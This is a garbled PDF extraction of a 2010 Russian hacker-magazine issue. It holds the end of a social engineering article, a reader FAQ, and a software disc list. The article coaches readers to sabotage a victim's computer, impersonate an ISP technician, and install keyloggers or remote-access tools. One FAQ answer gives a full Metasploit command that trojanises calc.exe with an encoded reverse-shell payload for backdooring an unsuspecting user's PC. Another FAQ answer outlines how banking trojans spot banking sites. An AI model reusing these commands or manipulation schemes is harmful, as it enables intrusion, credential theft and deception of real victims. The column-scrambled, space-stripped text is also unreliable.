Добавил:
Опубликованный материал нарушает ваши авторские права? Сообщите нам.
Вуз: Предмет: Файл:
Скачиваний:
12
Добавлен:
20.04.2024
Размер:
11.38 Mб
Скачать

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

ФИШИНГ И ФАРМИНГ

Фишинг (phishing, от англ. fishing — рыбалка, выуживание) — это попытка заманить жертву на фейк-сайт, в точности повторяющий оригинальный, где она вводит свои логин и пароль. Эти данные получают мошенники, пользуясь ими на свое усмотрение.

Фарминг (farming — занятие сельским хозяйством. Не ищи логику в названии. Социнженеры — ребята с юмором, назвали этот вид мошенничества по аналогии с фишингом) — с помощью подложного DNS-сервера или модифицированного файла HOSTS происходит перенаправление жертвы по ложному адресу.

схеме(делаюакцентнаслове«шаблонной», посколькукаждыйслучайиндивидуален, ив схемемогутбытьотклонениявпользууспешностидела):

1.Диверсия;

2.Реклама;

3.«Помощь».

То есть ты каким-либо образом создаешь обратимую проблему на компьютере потенциальной жертвы (диверсия). Она в отчаянии не знает, что делать и куда можно обратиться за помощью. И тут невзначай появляешься ты, демонстрируя свои знания в решении этой проблемы (реклама). Жертва слезно умоляет

флешек, сумнымвидомсадишьсязакомпьютер. Еслихозяинсамнедогадаетсяугоститьтебя чаем/пивом, твоязадачанамекнутьему:). Пока владельцакомпьютеранебудетвкомнате— займисьсамымипалевнымимоментами. Вобщем, дальнейшиедействияпонятныизависятот конечныхцелей: либонахождениеконфиденциальныхданных, либоустановкакейлоггераи просьбаввестилогин-парольсцельюпроверки работысайтаит.п.

ОднимизсложныхмоментовОСИявляетсятщательнаяподготовкакатаке. Тебенужнособратьи проанализироватькакможнобольшеданных обудущейжертве: ееоперационнуюсистему,

Схему атаки ОСИ можно разнообразить, например, рекламу провести до диверсии, тогда все будет выглядеть еще более непринужденно и спонтанно.

тебя помочь ей в починке любимого компа, и в этот момент ей даже в голову не придет мысль, что ее могут обманывать или получать доступ к личным данным. Этот факт дает относительную свободу действий социнженеру. Итак, ты приходишь к жертве (или она сама к тебе приходит со своим ноутбуком), а дальше под видом устранения проблемы действуешь в зависимости от целей: кейлоггеры,

бэкдоры, batch/VBScript/JScript-сценарии

— что угодно. И сделать это не так сложно, поскольку что конкретно ты переписываешь с флешки или на флешку, ламер вряд ли поймет.

Например, тыякобыслучайнознакомишьсяс будущейжертвойвICQ, впроцессеразговора упомянувотом, чтоутебяестьдруг, отличный спецвкомпьютерныхтехнологиях. Дальшепод видомкакой-нибудьфишкидля«Вконтакте» или архивафотографийвпариваешьемупрограмму, котораясильнозагружаетпамятьитормозит работукомпьютера. Гдеискатькорнипроблемы, юзер-жертванезнает. Будетлогично, еслион обратитсяктебезаконтактамидруга-IT’шника. Еслионневспомнитонем— твоязадача аккуратнонапомнить, обещаядоговоритьсяо бесплатнойпомощи. Дальшежертвазвонитили пишетдругу(тоесть, опятьтебе). Тыприходишь, приносишьссобоймногоразныхдисков,

браузер(см. раздел«Анализрабочегостола»), интересы, приблизительныйуровенькомпьютерныхзнанийит.п.

Какяужеговорила, схемуатакиОСИможно разнообразить, например, рекламупровести додиверсии, тогдавсебудетвыглядетьеще болеенепринужденноиспонтанно. Также можнофорсироватьобращениезапомощью. Пример: тызвонишьжертведомой, представившисьтехспециалистомкомпаниипровайдера(заблаговременноузнаешь ееназвание, возможныехарактеристики

оказываемыхуслуг, настройкисети). Сообщаешьотом, чтовсвязиснекоторымиизмененияминеобходимосменитьнастройкисети, просишьоткрытьнужныйраздел, диктуешь новыенастройки(темсамымсбиваяих). После введенияновыхпараметровинтернет, естественно, перестаетработать. Дляпроформы перебираешьещенескольковариантов настроек, иниоднаизнихнедолжнаспасти возникшуюситуацию. Тогдатыговоришь: «Бу- детелиВыдомаещевтечение10-15 минут? Сейчасподойдетспециалист». Итутглавное сработатьоперативно, чтобыжертва, изнывая отнетерпения, непозвониладействующему провайдеру. Тыприходишь, копаешьсявсистеме, устанавливаешьправильныерабочие настройки, заодноустанавливаякакую-нибудь

программудляперехватавводимыхданных илиорганизацииудаленногодоступа. После этогопросишьпроверитьпочту, какой-нибудь сайт… Вобщем, действуешьсогласносвоим целям. Оченьудобното, чтодажееслижертва умнаиотносительнонеламер, вмоментполомкиееголовабудетзанятарешениемпроблемы, анепоискомнесоответствийвтвоем неожиданномпоявлении. Именнопоэтому нужнохорошоподготовиться, чтобыпровести беспроигрышнуюдиверсию.

Итак, говоряобобратнойсоциальнойинженерии, следуетучитыватьто, чтоподготовка

катакеболеесложна, требуетпродумывания

имножествазапасныхвариантов. Новитоге онаобеспечиваетболеевысокуюрезультативность, исамоеглавное— жертвавконце останетсятебеблагодарна. Аэтодаетвысокийпроцентповторногообращенияза«помощью». Особенновыгодноиметьтакогодруга напредприятии: влюбоймоменттыможешь позвонитьипоинтересоваться, невозникает литехническихпроблем, непыталисьлизлоумышленникипроникнутьвсистему. Другими словами, тыконтролируешьситуациюнавсех этапах.

Заключение

В целом, глядя на вышеописанные методы работы, можно сказать, что четкой схемы всетаки нет. Социальная инженерия — это стиль мышления, а не наука. Если выработаешь в себе нужные механизмы подхода к ситуации, жертве, обстоятельствам, то сможешь эффективно использовать для своей выгоды. Все это постигается не сразу, а с опытом. Наблюдай, пробуй, повторяй уже совершенные «подвиги» — и со временем увидишь, что уже готовые схемы начнут получаться легче, появятся свои собственные уникальные идеи.

Подконецхочусказатьонекоторыхустановках, которыеопределяютуспешностьсоциального инженера:

1.Человеческийфактортакиработает. Если программаограниченарамкамидопустимых значений, тоэкспериментысчеловеческой психикойограниченытольконашимнезнанием еепроцессов.

2.Избавляйсяоткомплексов, шаблонови стереотиповмышления. Этопоможетэффективноиспользоватьиманипулироватьчужими стереотипами.

3.Учисьобщатьсясвободноиуверенно. Тыне сможешьубедитьчеловека, еслисамнебудешь уверенвтом, чтоделаешьиговоришь. Такженеплохобудетнаучитьсяречевымамортизациям (почитайпоэтойтемекнигу«Психологическое айкидо» МихаилаЛитвака).

4.Небойсяэкспериментировать. Невсегда всеполучаетсяспервогораза. Опытприходит

сошибкамииколичествомпрактики. Вэтом планенеудачныйопытценитсядажебольше, чемуспешный. Главное— научисьанализироватьсвоиошибкисучетомчеловеческого фактора.z

XÀÊÅÐ 07 /138/ 10

139

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

X

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

 

F

 

 

 

 

 

 

t

 

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

r

 

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

to

 

 

 

 

UNITS

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

w Click

 

 

 

 

 

o

m

 

 

w

 

 

 

 

 

 

 

 

 

 

.

 

 

 

 

 

 

.c

 

 

 

 

p

 

 

 

 

gАнтон «ant» Жуков

 

 

 

 

df

 

 

n

e

 

 

 

 

 

 

-xcha

 

 

Степан Ильин

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

faq

united@real.xakep.ru

Q: Вовремяреверсингачастонужноподсмотреть, чтоозначаеттотилиинойпараметр, передаваемыйвAPI-функцию. ЗаобъяснениемобычнообращаюсьвMSDN, ноэтодолгои неудобно. Можноликак-тонаучитьIDA, чтобыта добавляларасширенныекомментарииквход- нымпараметрамAPI-функций?

А:Действительно, запомнитьвходныепараметры, авместестемещеивозвращаемыезначения многочисленныхAPI — задача, мягкоговоря, непосильная. Чтобыупроститьсебежизнь, парни изzynamics.com написалиida-msdn-скрипт (взятьможноотсюда: github.com/zynamics/msdn- plugin-ida), которыйдобавляетисчерпывающую информациюизMSDN длякаждоговызоваAPIфункции— этокакразто, чтонамнужно. Правда, сначалапридетсясконвертироватьтвоюлокальноустановленнуюбиблиотекуMSDN вXML-файл. Сделатьэтоможноспомощьютулзыmsdncrawler (github.com/zynamics/msdn-crawler),

котораяпарситбиблиотекуMSDN игенерирует XMLфайл, содержащийинформациюобAPIфункцияхWindows (описание, именааргументов вместесописанием, возвращаемыезначения). Всегонаданныймоментmsdn-crawler находит 33984 (!) функции. Сформировавфайлmsdn.xml, остаетсятолькодобавитьизнегоинформацию вIDB-файл, которыйпонимаетсамаIDA. Для этогоиспользуемIDAPython ивыполняемсего помощьюскриптida_importer.py.

Q: ДовольночастоиспользуюTor длясохранения анонимности. Но, какизвестно, существуюттакиеутилитыкакsslstrip, позволяющиеперехватитьмоиданныенапоследнемузле, откудаони передаютсявСетьвоткрытомвиде. Можноли как-тосебяобезопаситьотподобноготипаатак?

A: Обезопаситьсебянавсе100% неполучится, нокое-какиемерывсежепредпринять можно. ВпакетутилитыTorTunnel (www. thoughtcrime.org/software/tortunnel) входит программаподназваниемTorScanner. Она особымобразомопрашиваетвсевыходные ноды, полученныеотсерверадиректорий, послечеговыводитнебольшойотчет, на какихузлахбылпереходсHTTPS наHTTP: torscanner host port / > dump.txt. Далее, если внестиподозорительныеузлывкачестве значенияпараметраExcludeNodes, тоTor исключитихприпостроениицепочекнодов. Идеяхорошая, нонедостатокочевиден: атакующийможетпоявитьсявнезапно, перехватитьтрафикиисчезнуть. Поэтомуэтотспособ

инедает100% гарантии.

Q:ХочупроверитьSWF-файлынаналичие вредоносногокода. Подскажиутилиту, которая лучшевсегоподходитдлядекомпиляцииFlashфайлов.

A:ВСетиестьмножествобесплатныхутилит длядекомпиляцииFlash-файлов, например знаменитыеFlare иOWASP's SWFIntruder. К

сожалению, возможностибесплатныхутилитне всегдаидутвногусовременем, поэтомуочень многиеизнихнеподдерживаюттенововведения, которыепоявилисьв9 и10 Flash’e, ActionScript 3 ифреймворкеAdobe Flex. Самой жепродвинутойутилитойнаданныймоментяв-

ляетсяHP SWFScan (www.hp.com/go/swfscan).

Этоперваяиединственнаябесплатная программа, умеющаяработатьсActionScript 2.0

иActionScript 3.0. Программаумеетнепросто декомпилироватьбайкодобратновисходный код— онасозданаспециальнодляпоиска

уязвимостейвоFlash-приложениях. Всегореализованообнаружениеболее60 разныхуязвимостей, включаяраскрытиеперсональных данных, XSS, междоменноеповышениепри-

вилегий(cross-domain privilege escalation) и

др. HP SWFScan примечательнаещеитем, что подсвечиваетнайденныевкодеуязвимости, предоставляетрекомендациииисчерпывающуюинформациюпоуязвимости, атакжеможет экспортироватьисходныйкоддлядальнейшего анализавстороннихприложения.

Q:Можноликак-топеренестизакладкииз

Firefox вOpera илиChrome?

A:Естьтакаязамечательнаяпрогакак

Transmute (www.gettransmute.com), кото-

руюможносмеломожноназватьстандартом де-фактодлясинхронизациизакладокмежду различнымибраузерами. Фишкавтом, чтопрогаподдерживаетработунетолькосбразуерами

(Firefox, Google Chrome, Opera, Internet Explorer

идругими), ноещеисонлайн-сервисамидля хранениязакладок. Правда, длясинхрониза-

циисGoogle Bookmarks, Delicious идругими хранилищамизакладокпридетсяприобрести платнуюверсию.

Q:Естьмного-многокоданаJavaScript скомментарияминакитайскомязыке. Задача— удалить оттудавсекомменты. Написалнесколькорегулярок, нонекоторыевещипрограммавсеравно пропускает. Аувасестьрешение?

A:Вбольшинствеслучаевбудетдо-

статочнопростогорегеспаcode. replace(/\/\*.+?\*\/|\/\/.*(?=[\n\r])/g, '').

Но, увы, оннесможетобработатьследующие ситуации:

140

XÀÊÅÐ 07 /138/ 10

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

Q: Можнолиотменитьслучайноотправленное письмо?

A: Внекоторыхслучаях— да! Уверен, чтоесли тыинепользовалсяGmail, то, поменьшей мере, обращалвниманиенакнопкуUndo, котораядоступнавтечениенекотороговремени послеотправкиписьма. Время, втечениекоторогописьмонаходитсявовременномбуфере ифизическинеотправляется, варьируетсяот 5 до20 секундирегулируетсявнастройках. ПользователиOutlook, работающиевсвязке сExchange-серверомтакжемогутотозвать письмо, воспользовавшисьсоответствующим пунктомвменю«Другиедействия».

 

 

Q: ХочупоэкспериментироватьсRFID. Всмысле,

 

 

несобиратьсчитывательилиэмуляторметок

 

 

снуля, аименноинтегрироватьеговрамках

 

 

какой-нибудьинформационнойсистемы. На-

 

 

пример, повеситьRFID-меткунаошейниккошки

 

 

иотслеживатьееперемещенияпоквартире,

 

 

записываяcheck-in влог-файл. Поидеи, ничего

 

 

сложноговэтомнет, еслиестьметкииRFID-счи-

Программировать на Python теперь можно в Visual Studio

тыватели. Подскажи, гдеихдостатькакможно

дешевле?

 

 

A:Хорошийвектортывыбралдляэкспериментов,

 

 

молодец! Темболеесейчаскакникогдаранеевсе

1. var str = " /* not a real comment */ ";

• разработкавспомогательныхплагиновк

необходимыеинструментысталидоступными.

2. var regex = /\/*.*/;

браузерам(Firefox/Chrome);

ПокупатьRFID-оборудованиевРоссии— невы-

Чтобыудалитьабсолютновсекомментарии,

• интерфейсLSP (Layered Service Provider),

годно. Наширазработки— дорогие, ате, чтовезут

длятакихситуацийпридетсянаписатьнеслож-

позволяющийпользователюподключать

сКитая, продаютсявтридорога. Поэтомусамый

ныеобработчики.

собственныеDLL-библиотекидляобработки

верныйспособ— заказатьвсесамомугде-нибудь

 

вызововWinsock API.

зарубежом. Еслипосерфитьтакиесайты, как

Q: ПризапускепоследнейверсииBacktrack на

Самый банальный вариант: троян от-

www.dealextreme.com, гдепродаетсямиллион

широкоформатномноутбукеустанавливается

слеживает определенную комбинацию в

товаровкитайскойпромышленности, можно

неправильноеразрешение. Какэтопофиксить?

названиях окон (например, «Super Bank») и

найтиNoName считывателиRFID поценеот$40.

A: НамоемстаромAsus помоглодобавление

таким образом понимает, что пользователь

Какправило, вкомплектеидетодна-двеметки

парыстрочеквконфиг/etc/X11/xinit/xinitrc:

перешел на сайт банка, а после этого тупо

дляэкспериментов. Увы, отвечатьзакачество

 

записывает в лог все клики и нажатия на

какого-токонкретноготоваразатакуюстоимость

xrandr –output HDMI-2 –offxrandr

клавиатуре.

никтонеможет. Авотчтодействительномогупо-

–output VGA –off

 

 

xrandr –output HDMI-2 –off

Настраиваем тулзу для поиска потерянного ноутбука

xrandr –output VGA –off

 

 

 

Послеэтогоизображениесталовыглядеть какнадо.

Q: Какбанковскиетрояныопределяют, что пользовательперешелнанужныйимсайт(а нуженим, какнесложнодогадаться, интерфейс онлайн-банкинга)?

A: Еслиговоритьпросто, тотроянунужно отслеживать, чтоделаетвеб-браузерпользо- вателяинакакиестраницыонпереходит. Для определенияпереходананужныйсайтиспользуютсядовольноразнообразныеприемы:

• перехватAPI-функции(впервуюочередь, WinInet API);

• интерфейсBHO (Browser Helper Object) — DLL-модуль, разработанныйкакплагиндля Internet Explorer дляобеспечениядополнительнойфункциональности;

• мониторингназванияокон(спомощью банальнойAPI-функцииFindWindow);

• работасCOM (Component Object Model) / OLE (Object Linking and Embedding) интерфейсами;

XÀÊÅÐ 07 /138/ 10

141

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

X

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

 

F

 

 

 

 

 

 

t

 

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

r

 

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

 

to

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

w Click

 

 

 

 

 

 

m

w

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

o

 

 

 

w

 

 

 

 

 

 

 

 

 

 

.

 

 

 

 

 

.c

 

 

 

 

p

 

 

 

 

g

 

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

UNITS

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

Качественный RFID-считыватель и набор меток за $52

советоватьпосвоемуопыту, такэтоRFID-модуль отизвестнойкомпанииParalax (www.parallax. com), которыйподключаетсяккомпьютеручерез серийный/USB порт. Товарможнокупитьпрямо насайтепроизводителя(ищипоключевым словамRFID Card Reader) поценеот$39,99 за штуку. Меткипридетсяпокупатьотдельно: одна RFID-карточкастоит$0,99.

Q: Укралиноутбук. ДалмилицииMAC-адрес, но учитывая, чтовгородемногопровайдеров, шанс найтиноутпоэтимданнымнебольшой. Хочу теперьпоставитьнавсесвоиноутбукикакуюнибудьпрограмму, котораяпостояннобудетстучатьсянасерверисливатьтудатекущуюинфу (скажем, IP-адрес). Втакойситуациипоймать подонковбудеткудапроще. Нокакэтолучше всегосделать?

A: Сампонимаешь, чтонаписатьпрограмму, которая, скажем, призапускебудетотправлять текущийIP-адрес, ничегонестоит. Ноэтого мало! ВнетбукахсейчасестьGPS — значит, можноотправлятьикоординаты. Пускайтакого модулянет, нопопараметрамточкидоступа Wi-Fi (MAC иESSID) зачастуютакжеможно определитьместорасположение(покрайней мере, Google.Картытакоепозиционированиемогутвыполнятьоченьздорово). Еслив ноутбукеестькамера, топочемубынесделать снимокскамерыинеотправитьегонасервер

— возможно, повезетувидетьнегодяявлицо. Влюбомслучаениктонемешаетотправить скриншотрабочегостола— туттожеможет бытьважнаяинформациядляпоискабука. Не нужнодаженичегокодитьвручную, потомучто всеэтидействияподдерживаютсяпрограммой Prey (preyproject.com). Версияутилитыужеесть длявсехдесктопныхплатформ: Windows, Mac иLinux, асовсемнедавнопоявиласьверсияи дляAndroid. СопределенныминтерваломPrey просыпаетсявсистемеистучитнаопределенныйURL, чтобыпроверить, непоявилась литамкоманданасборданных. Еслирежим поискаактивирован, тоонасамабудетпытаться

подключитьсякближайшемуWi-Fi (дажеесли злоумышленникэтогоделатьнебудет). Аизображениескамерывнекоторыхслучаяхбудет сниматьсянезаметно, тоестьбезвизуального оповещения(обычнорядомскамеройесть небольшойсветодиод).

Q:МожноликVisual Studio прикрутитьподсветку синтаксисаPython?

A:Можносделатьдажебольше. Снедавнего времениврамкахпроектахIronPython (это реализацияPython дляплатформы.Net) были опубликованыспециальныеинструментыдля работысPython-кодомвVisual Studio 2010.

Врезультатетыполучаешьмногиебонусы, которыепредоставляетIDE отMicrosoft, дляразработкикоданаPython, втомчисле

отладчик(хотяинетакоймощныйкакдляC#) и знаменитуюIntelliSense — системуподсказоки автодополнениякоманд.

Q:Подскажисамыйпростойспособоткрыть шеллнаудаленнойWindows-системеушастого пользователя.

A:Небудутутприводитьпримерымногочисленныхджоинеров, позволяющихприсоединитькневинномуexe’шникузловредныйкод. Можнообойтисьибезджоинера, и, собственно, безсамогобэкдора, заменивобоих Metaspoit'ом. Воднойизпоследнихверсий появиласьзамечательнаякомандаmsfencode, котораяприсоединяеткпроизвольномубинарникуоднуизбоевыхнагрузокMetasploit, втом числеbackconnect:

./msfpayload windows/meterpreter/ reverse_tcp LHOST=<òâîé ip> R | ./ msfencode -t exe -x calc.exe -k -o calc_backdoor.exe -e x86/shikata_ ga_nai -c 5

Еслиполучившийсяexe-файлзапуститьна удаленнойсистеме, тоснеетотчасжепоступит обратноесоединение.

Q:Хочуавтоматизироватьнуднуюработу, связаннуюсзаполнениемданныхвExcel-файл (*.XLS). Данныенеобходимообновлятьиз скрипта, написанногонаPython. Как?

A:Естьдваварианта. Использоватьготовые модули, например, Pyxlreader (pyxlreader. sourceforge.net), илижевоспользоваться технологиейCOM, спомощьюкоторойполучать данныесExcel напрямую(работатьсфайлом будетсамофисныйпакет). Второйвариант болеесложениктомужедобавляетобязательнуюзависимостьскриптаотустановленногов системеExcel.

Q:Чтонужнознать, чтобыреверситьприложе-

ниядляiPhone?

A:ВсеприложениядляiPhone имеютсвой форматисполняемыхфайлов— Mach-O. При этомсамоприложениераспространяетсяв видеIPA-файла— zip-архива, вкоторомупаковансамбинарник, атакжефайлы-ресурсы. Длятого, чтобыподнятьнателефонеусловия дляотладки, необходимдевайс, накотором установленJailBrake (тоестьдолженбыть рутовыйдоступкфайловойсистеме). После этогоутебябудетдоступкотладчикамgdb/ iphonedbg. ПриложенияизAppStore закриптованы: дешифрованиеосуществляетсязагруз- чикомMach-O. Защитанеслишкомсложная, кудабольшепроблемдоставляеттотфакт, что основнымязыкомразработкиприложенийяв- ляетсяObjective-C. Комплируемыйобъектноориентированныйязыкпрограммированияот корпорацииApple построеннаосновеязыка СиипарадигмSmalltalk. Последнееозначает, чтовсемобъектампосылаютсясообщения.

Врезультатебольшаячастьвызовов(>80%) программывыгодяткакobjc_msgSend(). Переваритьихбездополнительногопомощника довольносложно, однакографвызововможно серьезноупроститьипривестивбожеский видспомощьюскриптаzynamics Objective-C helper (github.com/zynamics/objc-helper- plugin-ida), подключаемогокIDA Pro ввиде плагина.

Q:Вомногиетелефонысейчасвстроенмодуль

A-GPS (Assisted GPS). Системаподгружаетиз инетаданные, необходимыедлябыстрого поискаспутника. Получается, чтодлязапуска GPS всегдануженинет?

A:Насамомделенет, Assisted GPS — это лишьсистема, ускоряющаятакназываемый «холодныйстарт» GPS, тоестьпроцесспервоначальногопоискаспутника. Частьнеобходимыхданных, втомчислеальманахстекущим расположениемспутников, подгружается втелефонииспользуетсядляпервичного определениякоординат. Есливозможности подгрузитьданныенет, тоGPS-модульрабо- таетвобычномрежиме: какеслибыA-GPS в

системенебыло. Впрочем, отдельныеприем- никисA-GPS безоператорасотовойсвязи работатьвсеженемогут, ноэтоисключение, а неправило.z

142

XÀÊÅÐ 07 /138/ 10

>>WINDOWS

>Development

Visual Studio 2010 Express

The Regex Coach 0.9.2

OllyDbg 2.0

Regulator 2.0

Regulazy 1.03

{smartassembly} 4.2

RJ TextEd 6.40

Аддоны для Visual Studio

VisualSVN Server 2.1.2

VisualSVN 2.0.1

Visual Assist X 2010

TestDriven.NET 3.0 Personal

StyleCop 4.3.3.0

ReSharper 5.0

NUnit 2.5

GhostDoc 2.5

DPack 3.0.3 for Visual Studio 2010

CruiseControl.NET 1.5

CodeRush 2010.1.4

Расширения для Visual Studio

Go To Definition 2.1

Triple Click 2.0

Hide Main Menu

ItalicCommentsFree 2.0

MoveToRegionVSX

Word Wrap with Auto-Indent 1.0

Regex Editor 1.5

GradientSelection 2.0

Selection Foreground 0.1

StructureAdornmentFree 1.9

Highlight all occurrences of selected word 1.31

Find Results Highlighter 1.0

Visual Studio Background

Customizer 1.0

Visual Studio Color Theme Editor 1.0

IntelliSense Presenter 1.5

>Misc

Prey 0.3.7

win7stack 0.80

GiMeSpace Free Edition 1.0.4.6

GetFoldersize 2.2.10

AllDup 3.0.2

RBTray 4.1

FLV Extract 1.6.0

Writespace 1.4

OnTopReplica 2.9.3

Ditto-cp 3.16.8

TeraCopy 2.12

Grow 2.0.3

PrintConductor 1.5

ViGlance OneStep V1

UltraSearch 1.3

1Password for Windows 1.0 beta

Clavier+ 10.6.1

PREDATOR 2.2.0

TouchFreeze 1.0.2

>Multimedia

VideoInspector 2.2.4.123

REAPER 3.52

mflow

RasterVect Free Edition 16.0

tinti 2.2.2

Taffy 0.5.0beta

VidCoder 0.41

Inkscape 0.47

Similarity 1.3

Free Audio Editor 2010

>Security

Webreak beta 0.1.1

MetaGooFil 1.4b

theHarvester 1.6

WebSlayer Beta

ProxyStrike 2.2

Sqlninja 0.2.5

Lansweeper 4.0

FUU 0.1beta

Malware Check Tool 1.0

Aircrack-ng 1.1

SIP Inspector 1.10

Blazentoo 0.1b

ThreatFactor NSIA

WhatWeb 0.4.3

Safe3 SQL Injector 6.2

ExploitMyUnion 2.1

iScanner 0.6

Yara 1.4

Harden SSLTLS beta

WebCruiser 2.3.2

FoxAnalysis 1.4.2

ChromeAnalysis 1.0.1

Watcher 1.4.0

Vera 0.1

>Net

FriendSea Presenter 1.2.0.6

NetSetMan 3.0.3

HomePipe

NetBalancer 1.0

TweetMyPC 3

Firewall Builder 4.0

inSSIDer

RFIDIOt 1.0a

Odysseus 2.0.0.84

Tinc 1.0.13

KpyM TelnetSSH Server 1.18b

USB to Ethernet 3.0.6

>System

Guru3D - Driver Sweeper

Explorer++ 1.1

Splunk 4.1.2

CrystalDiskMark 3.0.0d

LogLady 1.1

Sikuli IDE 0.10.1

RegFromApp 1.21

DOSBox 0.74

Soluto 1.0.721.0

VirtualBox 3.2 beta1

PC-Wizard 2010.1.94

Kiwi 1.4.2

FreeFileSync 3.7

HFSExplorer 0.21

Kaspersky CRYSTAL 9.0

ESET NOD32 4.2

>>UNIX

>Desktop

Banshee 1.7.1

Cdrtools 3.0.0

DirSync Pro 1.3

DockBarX 0.39

Dynamic Window Manager 5.8

Emacs 23.2

Evince 2.30.1

FFmpeg 0.5.2

Fotoxx 10.4

F-Spot 0.6.2

KOffice 2.2

MC 4.7.2

MythTV 0.23

Parole 0.2.0.2

PeaZip 3.1

Sweet Home 3D 2.4

Xfce 4.6.2

>Devel

Akshell 0.2

Android NDK R4

Android SDK R6

Apache Rivet 2.0

Arcadia 0.8.1

Automake 1.11.1

Bviplus 0.9.4

db4o 8

Django 1.2

Execute Query 3.2.1

jMonkeyEngine3 SDK alpha

JRuby 1.5.0

Native Client SDK

Qt 4.6.2

Rubinius 1.0

Smalltalk 3.2

Spket IDE 1.6.18

xmlsec1 1.2.16

ADT 0.9.7

>Games

The Battle for Wesnoth 1.8.2

>Net

Google Chrome 5.0.375.55

KTorrent 4.0

Midori 0.2.6

Pidgin 2.7.1

EiskaltDC++ 2.0.2

RTMPdump 2.2e

Mozilla Firefox 3.6.3

Dropbox 0.6.571

Mozilla Thunderbird 2.0.0.24

NetworkManager 0.8

Pino 0.2.10

Opera 10.10

gPodder 2.6

Konversation 1.2.3

GoldenPod 0.8.3

